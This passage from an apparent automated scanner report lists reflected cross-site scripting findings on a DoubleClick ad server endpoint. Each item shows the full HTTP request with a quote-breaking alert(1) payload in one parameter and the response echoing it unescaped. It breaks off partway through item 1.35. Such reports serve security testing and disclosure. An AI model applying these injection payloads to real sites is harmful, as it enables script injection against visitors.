The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d0bc'-alert(1)-'4aa45ed95d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:03 GMT
Expires: Thu, 03 Feb 2011 16:09:03 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4https://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604\">
...[SNIP]...

1.27. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b43"-alert(1)-"4b5b2d05a2f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:02 GMT
Expires: Thu, 03 Feb 2011 16:09:02 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2fhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.28. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6f88'-alert(1)-'5d816f81708 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497\">
...[SNIP]...

1.29. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e89c3"-alert(1)-"ea8dd10c3f1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604");
var fscUrl = url;
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1934"-alert(1)-"9335474a73d was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:00 GMT
Expires: Thu, 03 Feb 2011 16:09:00 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0bb5'-alert(1)-'b56bd520db3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:01 GMT
Expires: Thu, 03 Feb 2011 16:09:01 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af15d"-alert(1)-"24557353392 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497");
var fscUrl = url;
var f
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f94ae'-alert(1)-'43c15411da1 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ee8'-alert(1)-'ebf157e0bd6 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:59 GMT
Expires: Thu, 03 Feb 2011 16:08:59 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4ef6"-alert(1)-"6c82ad39022 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

